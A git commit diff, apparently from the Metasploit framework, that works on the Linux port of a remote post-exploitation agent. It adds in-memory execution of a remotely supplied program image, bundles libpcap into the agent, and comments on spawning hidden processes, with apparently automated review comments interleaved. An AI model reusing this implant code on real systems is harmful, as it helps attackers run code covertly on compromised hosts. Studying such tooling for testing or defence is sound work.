
commit some fixes from philip, see #2418

git-svn-id: file:///home/svn/framework3/trunk@10272 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake 2010-09-09 15:39:28 +00:00
parent 600afb35e5
commit 466153da06
7 changed files with 51 additions and 23 deletions


@ -294,11 +294,11 @@ scheduler_run(THREAD *thread)
LIST_REMOVE(current, link); LIST_REMOVE(current, link);
close(current->waitable); close(current->waitable);
channel_close((Channel *)current->context, remote, NULL, 0, NULL);
free(current); free(current);
nentries--; nentries--;
// how do we notify remote that we have closed fd?
// it just hangs atm :~(
} }
} }
} }
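Review bot: The new `channel_close((Channel *)current->context, remote, NULL, 0, NULL);` casts `current->context` to a channel and calls into it without checking it is non-NULL, and its return value is discarded, so a scheduler entry whose context is unset (or not a Channel) would pass garbage straight through; unless channel_close() is known to tolerate NULL, guard it with `if (current->context) channel_close((Channel *)current->context, remote, NULL, 0, NULL);`. The call is also made after `close(current->waitable)`, so if the channel's own close handler closes the same descriptor this becomes a double close on an fd number that may already have been reused — worth confirming which side owns the fd and documenting it in a one-line comment here. scheduler_run begins outside the hunk.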


@ -17,6 +17,9 @@
#include <sys/select.h> #include <sys/select.h>
#include <sys/endian.h> #include <sys/endian.h>
#include <netinet/in.h> #include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
// only do debugging on unix side of things for now. // only do debugging on unix side of things for now.
#define DEBUGTRACE #define DEBUGTRACE


@ -10,6 +10,10 @@ typedef BOOL (STDMETHODCALLTYPE FAR * LPFNCREATEENVIRONMENTBLOCK)( LPVOID *lpEn
typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment ); typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment );
typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION ); typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION );
#else
#include "linux-in-mem-exe.h"
#endif #endif
/* /*
@ -21,8 +25,8 @@ typedef BOOL (WINAPI * LPCREATEPROCESSWITHTOKENW)( HANDLE, DWORD, LPCWSTR, LPWST
DWORD request_sys_process_attach(Remote *remote, Packet *packet) DWORD request_sys_process_attach(Remote *remote, Packet *packet)
{ {
Packet *response = packet_create_response(packet); Packet *response = packet_create_response(packet);
HANDLE handle = NULL;
#ifdef _WIN32 #ifdef _WIN32
HANDLE handle = NULL;
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
DWORD pid; DWORD pid;
@ -67,21 +71,22 @@ DWORD request_sys_process_close(Remote *remote, Packet *packet)
{ {
Packet *response = packet_create_response(packet); Packet *response = packet_create_response(packet);
HANDLE handle; HANDLE handle;
#ifdef _WIN32
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
handle = (HANDLE)packet_get_tlv_value_uint(packet, TLV_TYPE_HANDLE); handle = (HANDLE)packet_get_tlv_value_uint(packet, TLV_TYPE_HANDLE);
if (handle) if (handle)
{ {
#ifdef _WIN32
if (handle != GetCurrentProcess()) if (handle != GetCurrentProcess())
CloseHandle(handle); CloseHandle(handle);
#else
// XXX ... not entirely sure this ports across.
#endif
} }
else else
result = ERROR_INVALID_PARAMETER; result = ERROR_INVALID_PARAMETER;
#else
DWORD result = ERROR_NOT_SUPPORTED;
#endif
// Send the response packet to the requestor // Send the response packet to the requestor
packet_transmit_response(result, remote, response); packet_transmit_response(result, remote, response);
@ -155,6 +160,8 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
{ {
Packet *response = packet_create_response(packet); Packet *response = packet_create_response(packet);
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
Tlv inMemoryData;
BOOL doInMemory = FALSE;
#ifdef _WIN32 #ifdef _WIN32
PROCESS_INFORMATION pi; PROCESS_INFORMATION pi;
STARTUPINFO si; STARTUPINFO si;
@ -162,8 +169,6 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
PCHAR path, arguments, commandLine = NULL; PCHAR path, arguments, commandLine = NULL;
DWORD flags = 0, createFlags = 0; DWORD flags = 0, createFlags = 0;
BOOL inherit = FALSE; BOOL inherit = FALSE;
Tlv inMemoryData;
BOOL doInMemory = FALSE;
HANDLE token, pToken; HANDLE token, pToken;
char * cpDesktop = NULL; char * cpDesktop = NULL;
DWORD session = 0; DWORD session = 0;
@ -546,7 +551,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
if( cpDesktop ) if( cpDesktop )
free( cpDesktop ); free( cpDesktop );
#else #else
PCHAR path, arguments, commandLine = NULL; PCHAR path, arguments;;
DWORD flags; DWORD flags;
char *argv[64], *p; char *argv[64], *p;
int in[2] = { -1, -1 }, out[2] = {-1, -1}; // file descriptors int in[2] = { -1, -1 }, out[2] = {-1, -1}; // file descriptors
@ -556,6 +561,8 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
pid_t pid; pid_t pid;
int have_pty = -1; int have_pty = -1;
int hidden = (flags & PROCESS_EXECUTE_FLAG_HIDDEN);
dprintf( "[PROCESS] request_sys_process_execute" ); dprintf( "[PROCESS] request_sys_process_execute" );
do { do {
@ -566,6 +573,11 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
dprintf("path: %s, arguments: %s\n", path ? path : "(null)", arguments ? arguments : "(null)"); dprintf("path: %s, arguments: %s\n", path ? path : "(null)", arguments ? arguments : "(null)");
if (packet_get_tlv(packet, TLV_TYPE_VALUE_DATA, &inMemoryData) == ERROR_SUCCESS)
{
doInMemory = TRUE;
}
// how to handle a single string argument line? we don't have a lexer/parser to // how to handle a single string argument line? we don't have a lexer/parser to
// correctly handle stuff like quotes, etc. could dumbly parse on white space to // correctly handle stuff like quotes, etc. could dumbly parse on white space to
// build arguments for execve. revert to /bin/sh -c style execution? // build arguments for execve. revert to /bin/sh -c style execution?
@ -663,6 +675,12 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
} }
} }
/*
* We can create "hidden" processes via clone() instead of fork()
* clone(child_stack, flags = CLONE_THREAD) should do the trick. Probably worth while as well.
* memory / fd's etc won't be shared. linux specific syscall though.
*/
pid = fork(); pid = fork();
switch(pid) { switch(pid) {
@ -672,7 +690,8 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
break; break;
case 0: case 0:
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) { if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED)
{
if(have_pty) if(have_pty)
{ {
dup2(slave, 0); dup2(slave, 0);
@ -690,9 +709,16 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
} }
for(i = 3; i < 1024; i++) close(i); for(i = 3; i < 1024; i++) close(i);
if(doInMemory)
{
perform_in_mem_exe(argv, environ, inMemoryData.buffer);
} else {
execve(path, argv, environ); execve(path, argv, environ);
exit(EXIT_FAILURE); }
dprintf("[%s] failed to execute program, exit(EXIT_FAILURE) time", __FUNCTION__);
exit(EXIT_FAILURE);
default: default:
dprintf("child pid is %d\n", pid); dprintf("child pid is %d\n", pid);
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) { if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) {
@ -826,7 +852,7 @@ DWORD request_sys_process_getpid(Remote *remote, Packet *packet)
#ifdef _WIN32 #ifdef _WIN32
packet_add_tlv_uint(response, TLV_TYPE_PID, GetCurrentProcessId()); packet_add_tlv_uint(response, TLV_TYPE_PID, GetCurrentProcessId());
#else #else
packet_add_tlv_uint(response, TLV_TYPE_PID, gettid()); packet_add_tlv_uint(response, TLV_TYPE_PID, getpid());
#endif #endif
packet_transmit_response(ERROR_SUCCESS, remote, response); packet_transmit_response(ERROR_SUCCESS, remote, response);
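Review bot: In the non-Windows branch of request_sys_process_execute the new `int hidden = (flags & PROCESS_EXECUTE_FLAG_HIDDEN);` reads `flags`, which is declared uninitialized as `DWORD flags;` two lines above and is evidently only filled from the packet later inside the `do { ... }` loop, so this is a read of an indeterminate value (undefined behaviour) and `hidden` is never used in the visible hunks anyway; declare it as `int hidden = 0;` and assign `hidden = (flags & PROCESS_EXECUTE_FLAG_HIDDEN);` after `flags` has been read, or drop it until the clone()-based hidden-process idea in the new comment is implemented. The new in-memory path `perform_in_mem_exe(argv, environ, inMemoryData.buffer);` hands the loader the TLV payload with no length, so the ELF parser has nothing to bound its reads of the remotely supplied image against — pass the size alongside (presumably `inMemoryData.header.length`) and have the loader reject images that do not fit. Minor: `PCHAR path, arguments;;` carries a stray second semicolon. request_sys_process_execute starts and ends outside these hunks.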


@ -33,7 +33,10 @@ libsupport.h: ../../bionic/compiled/libsupport.so
libmetsrv_main.h: ../../bionic/compiled/libmetsrv_main.so libmetsrv_main.h: ../../bionic/compiled/libmetsrv_main.so
../../../tools/so2h.pl ../../bionic/compiled/libmetsrv_main.so libmetsrv_main ../../../tools/so2h.pl ../../bionic/compiled/libmetsrv_main.so libmetsrv_main
metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h: ../../bionic/compiled/libpcap.so
../../../tools/so2h.pl ../../bionic/compiled/libpcap.so libpcap
metsrv_rtld.o: libc.h libm.h libcrypto.h libssl.h libmetsrv_main.h libsupport.h libpcap.h
rtldtest: rtldtest.c msflinker rtldtest: rtldtest.c msflinker
gcc -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'` gcc -o rtldtest rtldtest.c -DEP=`objdump -f msflinker | grep start | awk '{ print $$3 }'`


@ -27,6 +27,7 @@
#include "libssl.h" #include "libssl.h"
#include "libsupport.h" #include "libsupport.h"
#include "libmetsrv_main.h" #include "libmetsrv_main.h"
#include "libpcap.h"
struct libs { struct libs {
char *name; char *name;
@ -42,6 +43,7 @@ static struct libs libs[] = {
{ "libssl.so.0.9.8", libssl, libssl_length, NULL }, { "libssl.so.0.9.8", libssl, libssl_length, NULL },
{ "libsupport.so", libsupport, libsupport_length, NULL }, { "libsupport.so", libsupport, libsupport_length, NULL },
{ "libmetsrv_main.so", libmetsrv_main, libmetsrv_main_length, NULL }, { "libmetsrv_main.so", libmetsrv_main, libmetsrv_main_length, NULL },
{ "libpcap.so.1", libpcap, libpcap_length, NULL },
}; };
#define LIBC_IDX 0 #define LIBC_IDX 0


@ -547,12 +547,6 @@ _do_lookup(soinfo *si, const char *name, unsigned *base)
} }
} }
if(! strncmp(name, "dl", 2)) {
s = _elf_lookup(&libdl_info, elf_hash, name);
if((s != NULL) && (s->st_shndx != SHN_UNDEF))
goto done;
}
#if ALLOW_SYMBOLS_FROM_MAIN #if ALLOW_SYMBOLS_FROM_MAIN
/* If we are resolving relocations while dlopen()ing a library, it's OK for /* If we are resolving relocations while dlopen()ing a library, it's OK for
* the library to resolve a symbol that's defined in the executable itself, * the library to resolve a symbol that's defined in the executable itself,


@ -27,7 +27,7 @@ endif
objects = server/general.o server/stdapi.o server/fs/dir.o server/fs/file.o \ objects = server/general.o server/stdapi.o server/fs/dir.o server/fs/file.o \
server/fs/fs_util.o \ server/fs/fs_util.o \
server/net/socket/tcp.o server/net/socket/tcp_server.o server/net/socket/udp.o \ server/net/socket/tcp.o server/net/socket/tcp_server.o server/net/socket/udp.o \
server/sys/config/config.o server/sys/process/process.o server/sys/config/config.o server/sys/process/process.o server/sys/process/linux-in-mem-exe.o
#server/net/config/interface.o \ #server/net/config/interface.o \
#server/net/config/route.o \ #server/net/config/route.o \